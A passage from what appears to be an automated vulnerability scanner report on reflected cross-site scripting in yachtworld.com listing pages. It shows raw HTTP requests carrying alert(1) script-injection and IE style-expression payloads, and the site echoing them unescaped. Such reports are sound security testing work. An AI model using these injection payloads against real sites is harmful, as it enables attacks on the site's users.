Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 21:17:12 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c&boat_id=2152119">
...[SNIP]...

3.103. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d was submitted in the REST URL parameter 5. This input was echoed as 472fc"style="x:expression(alert(1))"b802179cd3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style="x:expression(alert(1))"b802179cd3d&boat_id=2152119">
...[SNIP]...

3.104. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144cb"><script>alert(1)</script>523d00231bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico?144cb"><script>alert(1)</script>523d00231bb=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&144cb"><script>alert(1)</script>523d00231bb=1&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.105. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18fb"><script>alert(1)</script>57c0f7d000b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
